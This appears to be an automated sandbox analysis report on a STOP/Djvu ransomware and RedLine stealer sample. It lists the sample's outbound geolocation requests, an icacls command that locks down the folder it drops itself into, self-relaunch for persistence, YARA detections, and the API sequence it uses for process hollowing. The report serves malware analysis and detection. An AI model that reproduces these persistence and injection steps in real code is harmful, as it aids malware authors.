                                                                                                2024-04-24 13:56:56 UTC475INData Raw: ba 20 d0 b1 d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 63 30 61 38 61 35 61 63 62 30 38 30 66 32 61 39 62 30 65 65 62 35 61 31 66 66 62 33 62 35 61 32 61 61 61 35 61 33 62 34 66 64 66 32 61 39 62 30 65 65 62 35 61 31
                                                                                                Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#c0a8a5acb080f2a9b0eeb5a1ffb3b5a2aaa5a3b4fdf2a9b0eeb5a1
                                                                                                2024-04-24 13:56:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.549708104.21.65.244434748C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-24 13:57:09 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                User-Agent: Microsoft Internet Explorer
                                                                                                Host: api.2ip.ua
                                                                                                2024-04-24 13:57:10 UTC912INHTTP/1.1 429 Too Many Requests
                                                                                                Date: Wed, 24 Apr 2024 13:57:09 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                strict-transport-security: max-age=63072000; preload
                                                                                                x-frame-options: SAMEORIGIN
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1; mode=block; report=...
                                                                                                access-control-allow-origin: *
                                                                                                access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U%2Bc6A%2FkgA7ryfPsrqQ8yMzJOY5qasJtBM78rDmVwkK7SxWVzu2IjkCDjB1%2BUej7vqfRGmVl2WGqTkeIACwsZxrHM2namVaM4SgLfnwiEY9syqSYnnnMPSXFyQyTY"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 879699ce9bd52b9e-LAX
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-24 13:57:10 UTC457INData Raw: 33 39 62 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 33 37 35 66 35 32 35 62 34 37 37 37 30 35 35 65 34 37 31 39 35 61 35 32 30 38 34 34 34 32 35 35 35 64 35 32 35 34
                                                                                                Data Ascii: 39b<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#375f525b4777055e47195a52084442555d5254
                                                                                                2024-04-24 13:57:10 UTC473INData Raw: d0 b1 d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 30 37 36 66 36 32 36 62 37 37 34 37 33 35 36 65 37 37 32 39 37 32 36 36 33 38 37 34 37 32 36 35 36 64 36 32 36 34 37 33 33 61 33 35 36 65 37 37 32 39 37 32 36 36 22 3e
                                                                                                Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#076f626b7747356e77297266387472656d6264733a356e77297266">
                                                                                                2024-04-24 13:57:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                4192.168.2.549716104.21.65.244432616C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-24 13:57:17 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                User-Agent: Microsoft Internet Explorer
                                                                                                Host: api.2ip.ua
                                                                                                2024-04-24 13:57:18 UTC914INHTTP/1.1 429 Too Many Requests
                                                                                                Date: Wed, 24 Apr 2024 13:57:18 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                strict-transport-security: max-age=63072000; preload
                                                                                                x-frame-options: SAMEORIGIN
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1; mode=block; report=...
                                                                                                access-control-allow-origin: *
                                                                                                access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9SThYXht%2FM1zBofmhG%2FVEW2qroeKJ%2BXx9LkHqy9efBXFjqWe1rE7vFwJjR3aJ5LJnP8soJ80ffT6JRJ3qVmxfEz0fii4k9oo53MZDvhVyniEwRjPOIQbD%2BupuYIj"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87969a03df4f2ad0-LAX
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-24 13:57:18 UTC455INData Raw: 33 39 62 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 62 64 64 35 64 38 64 31 63 64 66 64 38 66 64 34 63 64 39 33 64 30 64 38 38 32 63 65 63 38 64 66 64 37 64 38 64 65
                                                                                                Data Ascii: 39b<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#bdd5d8d1cdfd8fd4cd93d0d882cec8dfd7d8de
                                                                                                2024-04-24 13:57:18 UTC475INData Raw: ba 20 d0 b1 d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 63 31 61 39 61 34 61 64 62 31 38 31 66 33 61 38 62 31 65 66 62 34 61 30 66 65 62 32 62 34 61 33 61 62 61 34 61 32 62 35 66 63 66 33 61 38 62 31 65 66 62 34 61 30
                                                                                                Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#c1a9a4adb181f3a8b1efb4a0feb2b4a3aba4a2b5fcf3a8b1efb4a0
                                                                                                2024-04-24 13:57:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Statistics

                                                                                                CPU Usage

                                                                                                Click to jump to process

                                                                                                Memory Usage

                                                                                                Click to jump to process

                                                                                                High Level Behavior Distribution

                                                                                                Click to dive into process behavior distribution

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                General

                                                                                                Target ID:0
                                                                                                Start time:15:56:50
                                                                                                Start date:24/04/2024
                                                                                                Path:C:\Users\user\Desktop\mU2p71KMss.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\mU2p71KMss.exe"
                                                                                                Imagebase:0x400000
                                                                                                File size:781'824 bytes
                                                                                                MD5 hash:E9FF14A975F084F01373D468C0B91A16
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1990031031.0000000004388000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:1
                                                                                                Start time:15:56:50
                                                                                                Start date:24/04/2024
                                                                                                Path:C:\Users\user\Desktop\mU2p71KMss.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\mU2p71KMss.exe"
                                                                                                Imagebase:0x400000
                                                                                                File size:781'824 bytes
                                                                                                MD5 hash:E9FF14A975F084F01373D468C0B91A16
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:3
                                                                                                Start time:15:56:52
                                                                                                Start date:24/04/2024
                                                                                                Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:icacls "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                Imagebase:0x350000
                                                                                                File size:29'696 bytes
                                                                                                MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:4
                                                                                                Start time:15:56:52
                                                                                                Start date:24/04/2024
                                                                                                Path:C:\Users\user\Desktop\mU2p71KMss.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\mU2p71KMss.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                Imagebase:0x400000
                                                                                                File size:781'824 bytes
                                                                                                MD5 hash:E9FF14A975F084F01373D468C0B91A16
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2012495232.00000000044A7000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:5
                                                                                                Start time:15:56:53
                                                                                                Start date:24/04/2024
                                                                                                Path:C:\Users\user\Desktop\mU2p71KMss.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\mU2p71KMss.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                Imagebase:0x400000
                                                                                                File size:781'824 bytes
                                                                                                MD5 hash:E9FF14A975F084F01373D468C0B91A16
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:6
                                                                                                Start time:15:56:53
                                                                                                Start date:24/04/2024
                                                                                                Path:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe --Task
                                                                                                Imagebase:0x400000
                                                                                                File size:781'824 bytes
                                                                                                MD5 hash:E9FF14A975F084F01373D468C0B91A16
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2025120505.0000000004431000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000002.2025228021.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000002.2025228021.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                Antivirus matches:
                                                                                                • Detection: 100%, Avira
                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                • Detection: 45%, ReversingLabs
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:7
                                                                                                Start time:15:56:54
                                                                                                Start date:24/04/2024
                                                                                                Path:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe --Task
                                                                                                Imagebase:0x400000
                                                                                                File size:781'824 bytes
                                                                                                MD5 hash:E9FF14A975F084F01373D468C0B91A16
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000007.00000002.3243111162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000007.00000002.3243111162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000007.00000002.3243111162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                Reputation:low
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:9
                                                                                                Start time:15:57:05
                                                                                                Start date:24/04/2024
                                                                                                Path:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart
                                                                                                Imagebase:0x400000
                                                                                                File size:781'824 bytes
                                                                                                MD5 hash:E9FF14A975F084F01373D468C0B91A16
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000002.2156092371.000000000444D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000002.2156207791.0000000005C80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000002.2156207791.0000000005C80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:10
                                                                                                Start time:15:57:05
                                                                                                Start date:24/04/2024
                                                                                                Path:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart
                                                                                                Imagebase:0x400000
                                                                                                File size:781'824 bytes
                                                                                                MD5 hash:E9FF14A975F084F01373D468C0B91A16
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000A.00000002.2167150824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000A.00000002.2167150824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000A.00000002.2167150824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:12
                                                                                                Start time:15:57:15
                                                                                                Start date:24/04/2024
                                                                                                Path:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart
                                                                                                Imagebase:0x400000
                                                                                                File size:781'824 bytes
                                                                                                MD5 hash:E9FF14A975F084F01373D468C0B91A16
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000C.00000002.2241428739.00000000044D6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000002.2241519623.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000C.00000002.2241519623.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:13
                                                                                                Start time:15:57:15
                                                                                                Start date:24/04/2024
                                                                                                Path:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart
                                                                                                Imagebase:0x400000
                                                                                                File size:781'824 bytes
                                                                                                MD5 hash:E9FF14A975F084F01373D468C0B91A16
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Disassembly

                                                                                                Reset < >

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:1.2%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:44.7%
                                                                                                  Total number of Nodes:38
                                                                                                  Total number of Limit Nodes:8
                                                                                                  execution_graph 32526 5dd0000 32529 5dd0630 32526->32529 32528 5dd0005 32530 5dd064c 32529->32530 32532 5dd1577 32530->32532 32535 5dd05b0 32532->32535 32539 5dd05dc 32535->32539 32536 5dd061e 32537 5dd05e2 GetFileAttributesA 32537->32539 32539->32536 32539->32537 32540 5dd0420 32539->32540 32541 5dd04f3 32540->32541 32542 5dd04ff CreateWindowExA 32541->32542 32543 5dd04fa 32541->32543 32542->32543 32544 5dd0540 PostMessageA 32542->32544 32543->32539 32545 5dd055f 32544->32545 32545->32543 32547 5dd0110 VirtualAlloc GetModuleFileNameA 32545->32547 32548 5dd017d CreateProcessA 32547->32548 32549 5dd0414 32547->32549 32548->32549 32551 5dd025f VirtualFree VirtualAlloc Wow64GetThreadContext 32548->32551 32549->32545 32551->32549 32552 5dd02a9 ReadProcessMemory 32551->32552 32553 5dd02e5 VirtualAllocEx NtWriteVirtualMemory 32552->32553 32554 5dd02d5 NtUnmapViewOfSection 32552->32554 32557 5dd033b 32553->32557 32554->32553 32555 5dd039d WriteProcessMemory Wow64SetThreadContext ResumeThread 32558 5dd03fb ExitProcess 32555->32558 32556 5dd0350 NtWriteVirtualMemory 32556->32557 32557->32555 32557->32556 32560 4388026 32561 4388035 32560->32561 32564 43887c6 32561->32564 32566 43887e1 32564->32566 32565 43887ea CreateToolhelp32Snapshot 32565->32566 32567 4388806 Module32First 32565->32567 32566->32565 32566->32567 32568 4388815 32567->32568 32570 438803e 32567->32570 32571 4388485 32568->32571 32572 43884b0 32571->32572 32573 43884f9 32572->32573 32574 43884c1 VirtualAlloc 32572->32574 32573->32573 32574->32573

                                                                                                  Executed Functions

                                                                                                  Function 05DD0110 Relevance: 22.7, APIs: 15, Instructions: 248memorynativethreadCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 05DD0156
                                                                                                  • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 05DD016C
                                                                                                  • CreateProcessA.KERNELBASE(?,00000000), ref: 05DD0255
                                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 05DD0270
                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 05DD0283
                                                                                                  • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 05DD029F
                                                                                                  • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 05DD02C8
                                                                                                  • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 05DD02E3
                                                                                                  • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 05DD0304
                                                                                                  • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 05DD032A
                                                                                                  • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 05DD0399
                                                                                                  • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 05DD03BF
                                                                                                  • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 05DD03E1
                                                                                                  • ResumeThread.KERNELBASE(00000000), ref: 05DD03ED
                                                                                                  • ExitProcess.KERNEL32(00000000), ref: 05DD0412
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                                  • String ID:
                                                                                                  • API String ID: 93872480-0
                                                                                                  • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                  • Instruction ID: d1abb6f712b7367359e42187b8f22fcac9a618077d28a39e79142cc119e792e0
                                                                                                  • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                  • Instruction Fuzzy Hash: BEB1C874A00208AFDB44CF98C895FAEBBB5FF88314F248158E949AB395D771AD41CF94
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 043887C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
